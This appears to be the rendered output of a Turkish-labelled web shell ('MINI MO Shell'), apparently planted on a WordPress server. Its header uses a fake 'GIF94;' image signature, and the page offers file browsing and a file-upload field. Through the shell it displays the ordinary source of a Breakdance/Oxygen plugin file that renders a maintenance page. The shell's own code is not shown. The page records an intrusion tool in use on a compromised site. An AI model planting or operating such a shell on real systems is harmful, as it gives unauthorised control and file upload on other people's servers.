GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/themeless/theme-simulator/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/themeless/theme-simulator/maintenance-mode.php

<?php

namespace Breakdance\Themeless;

use function Breakdance\MaintenanceMode\optionsGetter;
use function Breakdance\Render\render;
use function Breakdance\Themeless\ThemeDisabler\is_theme_disabled;
use function Breakdance\Themeless\ThemeDisabler\is_zero_theme_enabled;

$page = optionsGetter('page');
$mode = optionsGetter('mode');
if ($mode === 'maintenance') {
    if (isset($_SERVER["SERVER_PROTOCOL"])) {
        header($_SERVER["SERVER_PROTOCOL"] . ' 503 Service Temporarily Unavailable');
    }
}

$isThemelessOrZeroTheme = is_theme_disabled() || is_zero_theme_enabled();

remove_theme_support('title-tag');
?>
<!doctype html>
<html <?php language_attributes();?>>
<head>
    <meta charset="<?php bloginfo('charset');?>">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?php if ($isThemelessOrZeroTheme) : ?>
        <?php echo getNormalizeDotCssLinkTag(); ?>
    <?php endif ?>
    <?php wp_head(); ?>
    <title>
        <?php echo esc_html($mode === 'coming-soon' ? __('Coming Soon', 'breakdance') : __('Maintenance', 'breakdance')); ?>
    </title>
</head>
<?php

$breakdance_or_oxygen_body_class = (string) BREAKDANCE_MODE;

?>
<body <?php body_class($isThemelessOrZeroTheme ? [$breakdance_or_oxygen_body_class] : []);?>>
<?php wp_body_open();?>
    <?php if ($page !== 'none') : ?>
        <?php echo render($page); ?>
    <?php else : ?>
        <p><?php esc_html_e('Down for maintenance.', 'breakdance'); ?></p>
    <?php endif; ?>
<?php wp_footer();?>
</body>
</html>

OHA YOOO - Tarih: 2026-08-04 01:52:24